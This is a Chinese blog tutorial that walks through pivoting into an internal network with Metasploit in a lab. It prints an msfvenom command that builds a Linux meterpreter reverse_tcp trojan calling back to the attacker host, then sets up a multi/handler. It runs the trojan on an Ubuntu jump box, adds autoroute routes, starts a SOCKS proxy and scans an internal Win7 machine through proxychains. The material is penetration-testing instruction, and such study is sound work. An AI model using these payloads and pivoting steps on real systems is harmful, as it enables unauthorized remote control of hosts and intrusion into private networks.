赞
踩
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问
当我们通过msf拿到一台边缘vps时,可以在msf中添加路由开启socks代理实现内网的访问
跳板机ubuntu:10.0.0.3、192.168.145.205
目标机器win7:10.0.0.2
攻击机kali:192.168.145.171
网卡的配置上一篇有说过 我在这里,这里就不再赘述了
首先我们用msfvemon制作一个木马,要使用reverse_tcp反向连接,因为正向连接可能会被防火墙阻挡。
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.145.171 lport=4444 -f elf >/home/wlw666/桌面/hhh.elf
然后我们开启msf,使用exploit/multi/handler模块
use exploit/multi/handler
设置payload,lhost,lport
set paylod linux/x86/meterpreter/reverse_tcp
然后run即可,可以看到显示正在等待连接
此时把我们的木马拖进跳板机里面,因为这次我们的跳板机是linux的ubuntu,所以一开始木马是没有执行权限的,我们先添加执行权限,+x的意思是赋予执行权限。
chmod +x hhh.elf
然后查看一下,确实被赋予了执行权限
然后我们执行木马程序
可以看到我们kali这边已经上线了ubuntu,拿到了meterpreter
现在我们来添加路由,输入命令查看当前添加的路由,啥也没有
run autoroute -p
输入命令添加路由,因为ubuntu的内网网段为10.0.0.1嘛,所以就添加它为路由就行了。添加路由就是告诉msf下一步要去哪里,可以理解为把10.0.0.1当成网关了,下一步把流量转发到那里,从而实现内网的访问。
run autoroute -s 10.0.0.1/24
此时我们再看一下,已经成功添加了,但是这个路由只能msf用。要是我们想用nmap来探测内网的信息就还需开启socks代理
输入命令搜索socks模块,使用第0个socks代理服务模块
然后看使用参数,srvhost设置为0.0.0.0或者127.0.0.1都行,意思是转发本地流量,srvport为转发端口可更改可不改,version为socks版本,4或者5都行。最后直接run就行
run之后会生成一个job,可以输入jobs查看
然后再来配置一下socks代理,输入命令打开配置文件
vim /etc/proxychains.conf
输入代理类型,ip地址还有代理端口,照着抄上面的就行了
最后扫描一下位于内网的机器,也就是10.0.0.2,记得加上proxychains
扫描结果
以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。